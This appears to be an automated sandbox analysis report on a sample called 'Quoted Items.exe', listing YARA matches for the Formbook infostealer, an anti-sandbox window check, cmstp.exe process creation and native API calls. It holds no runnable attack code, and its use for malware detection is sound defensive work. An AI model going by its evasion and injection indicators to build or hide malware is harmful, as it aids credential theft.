Source: 4.2.Quoted Items.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 4.0.Quoted Items.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 4.0.Quoted Items.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 4.0.Quoted Items.exe.400000.8.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 4.0.Quoted Items.exe.400000.8.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.Quoted Items.exe.41791d0.6.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.Quoted Items.exe.41791d0.6.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 4.2.Quoted Items.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 4.2.Quoted Items.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 4.0.Quoted Items.exe.400000.6.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 4.0.Quoted Items.exe.400000.6.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 4.0.Quoted Items.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 4.0.Quoted Items.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.Quoted Items.exe.402a8a0.5.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.Quoted Items.exe.402a8a0.5.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.Quoted Items.exe.2fc435c.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables potentially checking for WinJail sandbox window Author: ditekSHen
Source: 0.2.Quoted Items.exe.2fd9a34.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables potentially checking for WinJail sandbox window Author: ditekSHen
Source: 0.2.Quoted Items.exe.2fcd7e8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables potentially checking for WinJail sandbox window Author: ditekSHen
Source: 00000010.00000002.515431699.0000000003370000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000010.00000002.515431699.0000000003370000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.350947066.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.350947066.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000010.00000002.514085622.0000000000DB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000010.00000002.514085622.0000000000DB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000000.316596581.000000000D158000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000000.316596581.000000000D158000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.351326281.0000000000C10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.351326281.0000000000C10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000000.278783725.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000000.278783725.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000000.338397807.000000000D158000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000000.338397807.000000000D158000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000000.277402200.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000000.277402200.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.287722353.000000000402A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.287722353.000000000402A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.351362471.0000000000C50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.351362471.0000000000C50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000010.00000002.515850944.0000000004D70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000010.00000002.515850944.0000000004D70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

Source: Quoted Items.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED

Source: C:\Windows\explorer.exe

Process created: C:\Windows\SysWOW64\cmstp.exe C:\Windows\SysWOW64\cmstp.exe

Source: 4.0.Quoted Items.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 4.0.Quoted Items.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 4.2.Quoted Items.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 4.2.Quoted Items.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 4.0.Quoted Items.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 4.0.Quoted Items.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 4.0.Quoted Items.exe.400000.8.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 4.0.Quoted Items.exe.400000.8.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.Quoted Items.exe.41791d0.6.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.Quoted Items.exe.41791d0.6.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 4.2.Quoted Items.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 4.2.Quoted Items.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 4.0.Quoted Items.exe.400000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 4.0.Quoted Items.exe.400000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 4.0.Quoted Items.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 4.0.Quoted Items.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.Quoted Items.exe.402a8a0.5.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.Quoted Items.exe.402a8a0.5.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.Quoted Items.exe.2fc435c.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_Anti_OldCopyPaste author = ditekSHen, description = Detects executables potentially checking for WinJail sandbox window
Source: 0.2.Quoted Items.exe.2fd9a34.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_Anti_OldCopyPaste author = ditekSHen, description = Detects executables potentially checking for WinJail sandbox window
Source: 0.2.Quoted Items.exe.2fcd7e8.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_Anti_OldCopyPaste author = ditekSHen, description = Detects executables potentially checking for WinJail sandbox window
Source: 00000010.00000002.515431699.0000000003370000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000010.00000002.515431699.0000000003370000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.350947066.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.350947066.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000010.00000002.514085622.0000000000DB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000010.00000002.514085622.0000000000DB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000000.316596581.000000000D158000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000000.316596581.000000000D158000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.351326281.0000000000C10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.351326281.0000000000C10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000000.278783725.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000000.278783725.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000000.338397807.000000000D158000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000000.338397807.000000000D158000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000000.277402200.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000000.277402200.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.287722353.000000000402A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.287722353.000000000402A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.351362471.0000000000C50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.351362471.0000000000C50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000010.00000002.515850944.0000000004D70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000010.00000002.515850944.0000000004D70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research

Source: C:\Users\user\Desktop\Quoted Items.exe	Code function: 0_2_02D64360	0_2_02D64360
Source: C:\Users\user\Desktop\Quoted Items.exe	Code function: 0_2_02D640C0	0_2_02D640C0
Source: C:\Users\user\Desktop\Quoted Items.exe	Code function: 0_2_02D640B0	0_2_02D640B0
Source: C:\Users\user\Desktop\Quoted Items.exe	Code function: 0_2_07835AD8	0_2_07835AD8
Source: C:\Users\user\Desktop\Quoted Items.exe	Code function: 0_2_078356A3	0_2_078356A3
Source: C:\Users\user\Desktop\Quoted Items.exe	Code function: 0_2_078356B0	0_2_078356B0
Source: C:\Users\user\Desktop\Quoted Items.exe	Code function: 0_2_07830400	0_2_07830400
Source: C:\Users\user\Desktop\Quoted Items.exe	Code function: 0_2_078303F0	0_2_078303F0
Source: C:\Users\user\Desktop\Quoted Items.exe	Code function: 0_2_07836B98	0_2_07836B98
Source: C:\Users\user\Desktop\Quoted Items.exe	Code function: 0_2_07836BE0	0_2_07836BE0
Source: C:\Users\user\Desktop\Quoted Items.exe	Code function: 0_2_07836BF0	0_2_07836BF0
Source: C:\Users\user\Desktop\Quoted Items.exe	Code function: 0_2_07835AC8	0_2_07835AC8
Source: C:\Users\user\Desktop\Quoted Items.exe	Code function: 4_2_00401030	4_2_00401030
Source: C:\Users\user\Desktop\Quoted Items.exe	Code function: 4_2_0041BA9D	4_2_0041BA9D
Source: C:\Users\user\Desktop\Quoted Items.exe	Code function: 4_2_0041CB90	4_2_0041CB90
Source: C:\Users\user\Desktop\Quoted Items.exe	Code function: 4_2_00408C6B	4_2_00408C6B
Source: C:\Users\user\Desktop\Quoted Items.exe	Code function: 4_2_00408C70	4_2_00408C70
Source: C:\Users\user\Desktop\Quoted Items.exe	Code function: 4_2_00402D87	4_2_00402D87
Source: C:\Users\user\Desktop\Quoted Items.exe	Code function: 4_2_00402D90	4_2_00402D90
Source: C:\Users\user\Desktop\Quoted Items.exe	Code function: 4_2_00402FB0	4_2_00402FB0
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_051A2D07	16_2_051A2D07
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050D0D20	16_2_050D0D20
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_051A1D55	16_2_051A1D55
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_05102581	16_2_05102581
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_05192D82	16_2_05192D82
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_051A25DD	16_2_051A25DD
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050ED5E0	16_2_050ED5E0
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050E841F	16_2_050E841F
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050FB477	16_2_050FB477
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_0519D466	16_2_0519D466
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_05194496	16_2_05194496
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_051ADFCE	16_2_051ADFCE
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_051A1FF1	16_2_051A1FF1
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_0519D616	16_2_0519D616
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050F5600	16_2_050F5600
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050F6E30	16_2_050F6E30
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_05181EB6	16_2_05181EB6
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_051A2EF7	16_2_051A2EF7
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050DF900	16_2_050DF900
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050F4120	16_2_050F4120
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050F99BF	16_2_050F99BF
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_05191002	16_2_05191002
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_051AE824	16_2_051AE824
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050FA830	16_2_050FA830
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050EB090	16_2_050EB090
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_051020A0	16_2_051020A0
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_051A20A8	16_2_051A20A8
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_051A28EC	16_2_051A28EC
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050FA309	16_2_050FA309
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_051A2B28	16_2_051A2B28
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050FAB40	16_2_050FAB40
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_0517CB4F	16_2_0517CB4F
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050FEB9A	16_2_050FEB9A
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_0510138B	16_2_0510138B
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_0510EBB0	16_2_0510EBB0
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_051903DA	16_2_051903DA
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_0510ABD8	16_2_0510ABD8
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_0519DBD2	16_2_0519DBD2
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_051823E3	16_2_051823E3
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_0518FA2B	16_2_0518FA2B
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_050FB236	16_2_050FB236
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_051A22AE	16_2_051A22AE
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_05194AEF	16_2_05194AEF
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_00DCCB90	16_2_00DCCB90
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_00DB8C70	16_2_00DB8C70
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_00DB8C6B	16_2_00DB8C6B
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_00DB2D90	16_2_00DB2D90
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_00DB2D87	16_2_00DB2D87
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_00DB2FB0	16_2_00DB2FB0

Source: C:\Windows\SysWOW64\cmstp.exe

Code function: String function: 050DB150 appears 145 times

Source: C:\Users\user\Desktop\Quoted Items.exe	Code function: 4_2_004185D0 NtCreateFile,	4_2_004185D0
Source: C:\Users\user\Desktop\Quoted Items.exe	Code function: 4_2_00418680 NtReadFile,	4_2_00418680
Source: C:\Users\user\Desktop\Quoted Items.exe	Code function: 4_2_00418700 NtClose,	4_2_00418700
Source: C:\Users\user\Desktop\Quoted Items.exe	Code function: 4_2_004187B0 NtAllocateVirtualMemory,	4_2_004187B0
Source: C:\Users\user\Desktop\Quoted Items.exe	Code function: 4_2_004186FA NtClose,	4_2_004186FA
Source: C:\Users\user\Desktop\Quoted Items.exe	Code function: 4_2_004187AA NtAllocateVirtualMemory,	4_2_004187AA
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_05119540 NtReadFile,LdrInitializeThunk,	16_2_05119540
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_051195D0 NtClose,LdrInitializeThunk,	16_2_051195D0
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 16_2_05119710 NtQueryInformationToken,LdrInitializeThunk,	16_2_05119710
